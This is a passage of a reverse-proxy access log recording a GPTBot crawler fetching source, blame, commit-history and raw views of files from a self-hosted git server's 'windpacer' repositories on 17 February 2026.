"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51493] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10871] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39569] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42037] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42205] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44640] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13041] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 9902] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" -[17/Feb/2026:13:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13840] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 74.7.227.38] [Length 11445] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:13:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11378] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.rss" [Client 74.7.227.38] [Length 9686] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:25:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" [Client 74.7.227.38] [Length 10457] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11240] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" -[17/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13623] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" -[17/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 14221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 14398] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" -[17/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 13008] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" -[17/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 11349] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12792] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11526] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11652] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" -[17/Feb/2026:13:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 74.7.227.38] [Length 10365] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 13284] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" -[17/Feb/2026:13:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" -[17/Feb/2026:13:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 74.7.227.38] [Length 10607] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" -[17/Feb/2026:13:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] 